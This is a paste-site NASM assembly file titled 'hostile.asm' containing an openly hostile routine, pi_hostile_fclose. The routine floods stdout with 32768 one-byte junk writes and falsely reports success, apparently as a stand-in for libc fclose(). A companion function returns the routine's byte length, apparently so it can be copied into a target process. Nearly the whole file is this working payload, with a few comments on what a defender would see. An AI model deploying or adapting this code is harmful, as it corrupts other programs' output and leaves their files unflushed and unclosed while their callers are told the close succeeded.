FlyFar

hostile.asm

Jul 7th, 2023
ASM (NASM) 1.41 KB | Cybersecurity | 0 0
  ;-----------------------------------------------------------------------
  ; Build-time constants (NASM preprocessor). The syscall number and the
  ; register usage further down match the x86-64 Linux syscall convention.
  ;-----------------------------------------------------------------------
  %define ZERO_ARGS           0           ; parameter count given to every %macro below
  %define WRITE_SYSCALL_NUM   1           ; loaded into rax before `syscall` (write)
  %define STDOUT_FILENO       1           ; fd argument of the write (rdi)
  %define BUF_LEN             1           ; byte count of each write (rdx)
  %define LOOP_COUNTER        0x8000      ; number of writes issued: 32768
  %define RANDOM_NUM          0x100       ; fixed value, not random; pushed as the buffer qword (low byte 0x00)
  ;-----------------------------------------------------------------------
  ; do_write_syscall: issue write(STDOUT_FILENO, rsi, BUF_LEN).
  ; In:    rsi = address of the bytes to write (set up by the user of the macro)
  ; Out:   rax = syscall return value; nothing here checks it
  ; Clobb: rax, rdi, rdx, and rcx/r11, which the `syscall` instruction overwrites
  ;-----------------------------------------------------------------------
  %macro do_write_syscall ZERO_ARGS
          mov     eax, WRITE_SYSCALL_NUM      ; 32-bit write zero-extends into rax
          mov     edi, STDOUT_FILENO
          mov     edx, BUF_LEN
          syscall
  %endmacro
  ;-----------------------------------------------------------------------
  ; func_ret: return to the caller with rax = 0.
  ; Clobb: rax, flags
  ;-----------------------------------------------------------------------
  %macro func_ret ZERO_ARGS
          xor     eax, eax                    ; zeroes all of rax
          ret
  %endmacro
  ;-----------------------------------------------------------------------
  ; save_regs: push eight general-purpose registers (64 bytes of stack).
  ; Must be undone by restore_regs, which pops in the exact reverse order.
  ; rax is deliberately absent: it carries the return value.
  ;-----------------------------------------------------------------------
  %macro save_regs ZERO_ARGS
          push    rbx
          push    rdx
          push    rcx
          push    rdi
          push    rsi
          push    r8
          push    r9
          push    r10                         ; last pushed, first popped
  %endmacro
  ;-----------------------------------------------------------------------
  ; restore_regs: pop the eight registers pushed by save_regs.
  ; The order is the mirror image of save_regs; rsp must point at the
  ; saved r10 slot when this expands.
  ;-----------------------------------------------------------------------
  %macro restore_regs ZERO_ARGS
          pop     r10
          pop     r9
          pop     r8
          pop     rsi
          pop     rdi
          pop     rcx
          pop     rdx
          pop     rbx                         ; first pushed, last popped
  %endmacro
  ;-----------------------------------------------------------------------
  ; clear_regs: zero rax, rbx, rcx, rdx, rdi, rsi, r8, r9 and r10.
  ; Each 32-bit xor also clears the upper half of the 64-bit register.
  ; Clobb: the nine registers above, flags
  ;-----------------------------------------------------------------------
  %macro clear_regs ZERO_ARGS
          xor     eax, eax
          xor     ebx, ebx
          xor     ecx, ecx
          xor     edx, edx
          xor     edi, edi
          xor     esi, esi
          xor     r8d, r8d
          xor     r9d, r9d
          xor     r10d, r10d
  %endmacro
  section .text

  ; Exported symbols: the routine itself and the helper that reports its size.
  global  pi_hostile_fclose
  global  pi_get_hostile_len
  ;-----------------------------------------------------------------------
  ; pi_hostile_fclose: flood stdout, then report success.
  ;
  ; Behaviour: issues LOOP_COUNTER (0x8000 = 32768) separate one-byte
  ; write syscalls on fd 1. The byte starts at 0x01, goes up by one per
  ; write and wraps at 256. Returns rax = 0. It reads no arguments and
  ; calls no other function.
  ; NOTE(review): the name suggests this runs in place of libc fclose();
  ; how it gets installed is not shown here. If so, the stream is neither
  ; flushed nor closed while the caller is told the close succeeded.
  ;
  ; What a defender would see: a burst of 32768 write(1, buf, 1) calls in
  ; a syscall trace or audit log, junk bytes on stdout, and descriptors
  ; that stay open after an apparently successful close.
  ;
  ; Out:   rax = 0
  ; Clobb: r11 (by `syscall`), flags; all other registers are restored
  ; Stack: 9 qwords, plus one more around each syscall. Memory access is
  ;        stack-only; no data sections or absolute addresses are used.
  ;-----------------------------------------------------------------------
  pi_hostile_fclose:
          save_regs
          clear_regs

          push    RANDOM_NUM                  ; stack slot; its low byte (0x00) is the buffer
          mov     rsi, rsp                    ; rsi = buffer address for every write
          mov     ecx, LOOP_COUNTER           ; rcx = writes still to issue

  .next_byte:
          inc     byte [rsi]                  ; next byte value, wraps 0xFF -> 0x00
          push    rcx                         ; `syscall` overwrites rcx
          do_write_syscall
          pop     rcx
          loop    .next_byte                  ; rcx -= 1, repeat while rcx != 0

  .done:
          pop     rax                         ; discard the buffer slot
          restore_regs
          func_ret
  pi_hostile_fclose_end:                      ; first address past pi_hostile_fclose

  ;-----------------------------------------------------------------------
  ; pi_get_hostile_len: size in bytes of pi_hostile_fclose.
  ; In:    nothing is read
  ; Out:   rax = pi_hostile_fclose_end - pi_hostile_fclose, a constant
  ;        fixed at assembly time
  ; Clobb: rax
  ;-----------------------------------------------------------------------
  pi_get_hostile_len:
          mov     eax, pi_hostile_fclose_end - pi_hostile_fclose
          ret
Tags: hostile